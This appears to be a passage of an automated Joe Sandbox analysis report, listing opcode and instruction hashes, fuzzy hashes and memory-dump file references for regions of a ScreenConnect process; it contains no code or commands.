                                                                                                                                                                                                                                                    • Instruction ID: 182db8dc131af58b84c5d1e1cdc3bdfc75546c282388b0fbfaf62bdba1fb4626
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 302a912c8875c19e9af85aa616509c844aa24daa43639f9117957346695f0394
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F213172A04201CFCF289F78D99856ABBF4FF4672574482AED41A872A6DB309802CB51
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: adde603b9fb62feee559975771c63714999b66ae5ba63482342fa341dd5bdab1
                                                                                                                                                                                                                                                    • Instruction ID: 7d7954bfba48e9e2d4fe2f8ae114d417af2f036f4b5cd1894699bd6aa9e0b6d5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: adde603b9fb62feee559975771c63714999b66ae5ba63482342fa341dd5bdab1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34210731B002415FEB09DB38D990BAD7BE6EFD6210F08956AD4089B365DF74AD05C7D2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3288812848.0000000001B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B6D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1b6d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7459fe353517ab239a0a3f77f26eaaa57d744d914f30d95157a39c34336a1b1b
                                                                                                                                                                                                                                                    • Instruction ID: 5ff76935c1bc1e4d8ea6e5e8b6b570c7f46e640668712e31a8c3c8c2a3eeb013
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7459fe353517ab239a0a3f77f26eaaa57d744d914f30d95157a39c34336a1b1b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B214871200240DFCB09CF54D9C0F26BF69FBA8314F2486A9E9490B256C33ED416CBA2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 59efccaccee5938a83eb7406449b5a2aa15d7c04e0f61455cb6c30a8569efec4
                                                                                                                                                                                                                                                    • Instruction ID: 5e4de3aeb4807b51ed773a1e4105aff6c3da24a2a4eaaa2df5f53743e718b706
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59efccaccee5938a83eb7406449b5a2aa15d7c04e0f61455cb6c30a8569efec4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6821B0317002058FDB04DB68D9819AEBBF5FF89710B1085BAD5099B365DB34FC16CB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: cd611041529d4f4589abbd3447d2fa7a828146590362a878cc66a7e055f2f11a
                                                                                                                                                                                                                                                    • Instruction ID: 2dfa73ed86ec28398267e9bf321c24e087f9689f0c68c457ce29070b3e727da0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd611041529d4f4589abbd3447d2fa7a828146590362a878cc66a7e055f2f11a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4521A471A002059FDB04DF64D8819AEBBF9FF88310B10857AD509DB325DB38ED16CB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: df6c7e62e59d82e0eeff3c3def2ad1c7295406449c74fb9f8108ee58acdfd510
                                                                                                                                                                                                                                                    • Instruction ID: 161552a8dc005e6c8b7926ad1ff57884b5c6cff2b601bf95455aae0368f4f231
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df6c7e62e59d82e0eeff3c3def2ad1c7295406449c74fb9f8108ee58acdfd510
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A41138A7D0E2C2CFC71AA73898684D07F64EE6794170905DFE185CF267E3458406CB42
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: cdbb6b939dee2e70031700ff170b493a8c9f24f4a14706a17dae9d688d91bc0f
                                                                                                                                                                                                                                                    • Instruction ID: b032c6c6bbad234b2e210a05a95920ac9a86604ae7a8c921b8c46c432b8e2827
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdbb6b939dee2e70031700ff170b493a8c9f24f4a14706a17dae9d688d91bc0f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B11E0A6A4D3C55FD7068728D891995BF65EF93220B1A80DFD489CF1A3D628D907C321
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7bc202935839ceb2c55e253aae27404060584fc9bfc217badaa8971e244c7ae9
                                                                                                                                                                                                                                                    • Instruction ID: 6c08d95767f33b5100040d57da72b42cc31875346e8dd8b5012344604d2b4ced
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bc202935839ceb2c55e253aae27404060584fc9bfc217badaa8971e244c7ae9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D213E302006058FD738DF29D84459ABBF5EF88720B108B6DD5939B6A5EB31E95ACF90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8b91b2297b64e004689f28bb91848824e4dc48dbe6aff9a41b0122397ca49ce0
                                                                                                                                                                                                                                                    • Instruction ID: 05010e52956398ec6d9cd0b8500a5a43a08c09c208b4f5067b7578d487b23c28
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b91b2297b64e004689f28bb91848824e4dc48dbe6aff9a41b0122397ca49ce0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3213676800249DFDB14CF9AC844AEEBBB5FB48310F14846DE914A7250C339A555CFA1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 27e048a6c738efac7ca92386d396aef748ac0bf02649ae4b52b22ba63f07fa13
                                                                                                                                                                                                                                                    • Instruction ID: e92998acad2f152db7136e3be5b3b35855d8de2efb70b96fba33e3f355e3ff6b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27e048a6c738efac7ca92386d396aef748ac0bf02649ae4b52b22ba63f07fa13
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48211D30A007058FD728EF39D544A6BBBF5FF48B10B108A6CE5A687694E734E905CB90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e856077263147551d38780cc7058e14e9d46e86712abbb4401ccab63d4716139
                                                                                                                                                                                                                                                    • Instruction ID: 6cae891694acfe6a2f2cc4e13728fbb91f399c052b0f59e1116f0b97bd9f2534
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e856077263147551d38780cc7058e14e9d46e86712abbb4401ccab63d4716139
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E211A32D1070A99CB10EFB9D8405EEFBB4EF99250F10CA2AE559B7111FB70A295CB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c5e788d8405882492015cf9a65ec2231aefb3d266a9cca18841779b66df162aa
                                                                                                                                                                                                                                                    • Instruction ID: 94544ba192438826c0bf47f366e290bac19a4305d24d0eeef8a0e1abbdfdca1d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5e788d8405882492015cf9a65ec2231aefb3d266a9cca18841779b66df162aa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E611E6357002015BEB08EB28D981B6EB7EBFFC8210F049529D409AB364DF74AD0987D1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4ace155177252767972da8debc8922817e8613d9953d173590b21a8cc227e60e
                                                                                                                                                                                                                                                    • Instruction ID: 1bc5422f4d8d766b82f3bc03f243bae5d3196f45ed51da5190ecd1745510cde3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ace155177252767972da8debc8922817e8613d9953d173590b21a8cc227e60e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A211AB33B453109FC7419E7CD818B9E3FE9EF4A210F0941AAE90ACB360CA24DC0987C0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6cddda2ca8e482c2c6bf0fdd6c78eb5f0ea5ca6470b3f76d269adc238a5c0262
                                                                                                                                                                                                                                                    • Instruction ID: 575dbc6fad96c988d4ae266de96142bc03642311a827911b7ead8a03b3a3db85
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cddda2ca8e482c2c6bf0fdd6c78eb5f0ea5ca6470b3f76d269adc238a5c0262
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A114F31B002099FDB04DB68DD819AEBBF9FF88210B10857AE519AB364DB34FD15CB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2213fddaa4614766c4d7472c42f57a1fa314a10809d282f60dd4dfdd2d6f99da
                                                                                                                                                                                                                                                    • Instruction ID: 1f84154f6157ff68fc4be41ba0500cd8fe48260570ca5c9e1abecc829aa450d8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2213fddaa4614766c4d7472c42f57a1fa314a10809d282f60dd4dfdd2d6f99da
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E911C432E041499BDF09EFA9D4104DDFFB2EF86350F09846AD145B7125D7326916CB90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 289458039ec46f31ecc3563bdf4191b38b55a1fa0183793189a91a8ec697fa77
                                                                                                                                                                                                                                                    • Instruction ID: f88a286240260325aa83d4fee187b35257353215062345275d3a117595f45d1d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 289458039ec46f31ecc3563bdf4191b38b55a1fa0183793189a91a8ec697fa77
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F01D4726887410FD3099A68A8819DA7FB8DF8727430541BBD44ACB2A3D66CDD4BC7A1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1fb0eb0a40a977f73220977a984611d9196681c872f7bddcd9f8b209a1ecb795
                                                                                                                                                                                                                                                    • Instruction ID: fb243e0ecd9b69859b54f4b51ed0ed8c026c13641f705a7098265edadd8b01ad
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fb0eb0a40a977f73220977a984611d9196681c872f7bddcd9f8b209a1ecb795
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4811C632A093950FCB0B4B7858200967FB5EF9665431985EFD149CB253EB79DC0BC790
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 0bb35c331d2a98f6981e47d2b34f56a06e67db7690676f91e2c147d01be8f918
                                                                                                                                                                                                                                                    • Instruction ID: b46c8792535053e6a98bb92b93d791349e86b9ef2fcd5fb0b430a91178094f05
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bb35c331d2a98f6981e47d2b34f56a06e67db7690676f91e2c147d01be8f918
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A11B2369002469FCF05DFA8D8408DEBBF1EF4A314B1485AAD545BF261D736AD0BCB90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3288812848.0000000001B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B6D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1b6d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                                    • Instruction ID: 49bc76896aa4b9b89289ad1bda02046a9a6e83154e5824c46be1ed5453af4bbf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7511E176504280CFCB06CF54D5C4B26BF71FB98314F24C5A9D9490B257C33AD45ADBA2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7dc6298c7e94a5d7451994e58ec359ea1ae76b4a65ca288e13371d7ff0ae32dd
                                                                                                                                                                                                                                                    • Instruction ID: 5ed162268cabcd92f4ae97d5c18763393033f67c12b4a66a48024d627372b327
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7dc6298c7e94a5d7451994e58ec359ea1ae76b4a65ca288e13371d7ff0ae32dd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 052117B6D002499FDB24DF9AC484BDEFBF4EF88320F14846AD919A7240D378A545CFA5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4735ed9b5129e6bae3f412b684f0a4c152de4d8435e051b8e278d2e928288e37
                                                                                                                                                                                                                                                    • Instruction ID: a33a3f470be42b1d038f10b2c6ccabf1757e98709adf566382226ff738748e4a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4735ed9b5129e6bae3f412b684f0a4c152de4d8435e051b8e278d2e928288e37
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F511333590010ADFCF05DFA8C9409DDBBF1EF49344B14846AD504FB261D731AA1ACB90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 788c67b137834441e4f47479b4edc3e17a3560bbec71e73043717cebaa6f6469
                                                                                                                                                                                                                                                    • Instruction ID: 47d28d5eafd80f943a0306759466888141e47b14b26b1fa733cc5184734a03cb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 788c67b137834441e4f47479b4edc3e17a3560bbec71e73043717cebaa6f6469
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63017C767400118B8708DA6EF89496EB3EBEBD8625354847AE609C7311CB32AC138764
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7a9c1e9911c3e07b5305947d0ccfe4c3f3ef385fe532804b05b58b454f1b6f37
                                                                                                                                                                                                                                                    • Instruction ID: 5e575f64ed461d2bfc6c06d2be8c74ca227264130ebf3b95f26cc3428d918eeb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a9c1e9911c3e07b5305947d0ccfe4c3f3ef385fe532804b05b58b454f1b6f37
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44118E71E40205AFEB18CA6DC800AAFB7F7EFC4711F1485AAD554DB254E7729A01CB90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3da1dccfa2399cbb928a292824a35ea7f2998b1e83431b068a2444d3d5c4542a
                                                                                                                                                                                                                                                    • Instruction ID: 9efd8a521d434d41719cb44007b2ba6ef666fdb550da5ede3f1618237e734e93
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3da1dccfa2399cbb928a292824a35ea7f2998b1e83431b068a2444d3d5c4542a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7711CE71E40245EFEB19CB6CC8006EEBBF7AF85710B1885AAD594DB164D7729A02CB40
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: df965d3c96b4b617586ac4af13f8e46f0f778e68d5e2a4a9d0f58d89c876acf2
                                                                                                                                                                                                                                                    • Instruction ID: 614cd22efcc34c66e822373e3f3bb0d51f3103976dea581d979bb21d8d936547
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df965d3c96b4b617586ac4af13f8e46f0f778e68d5e2a4a9d0f58d89c876acf2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60113070D402188FDF18DBA8D9616EDBFB1EF48310F10086AD006BB2B4DB781D42CBA1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 28be47aef28759b2e0accae72ad5ab366fbdc2d8204d3b7e051bd359b31931cf
                                                                                                                                                                                                                                                    • Instruction ID: 40383769274bf38efe6d4be816b785a13f6d70afedcd89fdc2c96bf47f95fd86
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28be47aef28759b2e0accae72ad5ab366fbdc2d8204d3b7e051bd359b31931cf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2211583190001EDBCB09DFACD5948ECBFB2FF85314B49C599E009AB129D736A946CB60
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: efa581823080e3913535b57af0a382f99b4cb4a206f0518fac3c0e343dc2fe9b
                                                                                                                                                                                                                                                    • Instruction ID: f24483721b598ffd11684dfe6beffb4daa41b3e07fbd822b525bf40f9afd02aa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efa581823080e3913535b57af0a382f99b4cb4a206f0518fac3c0e343dc2fe9b
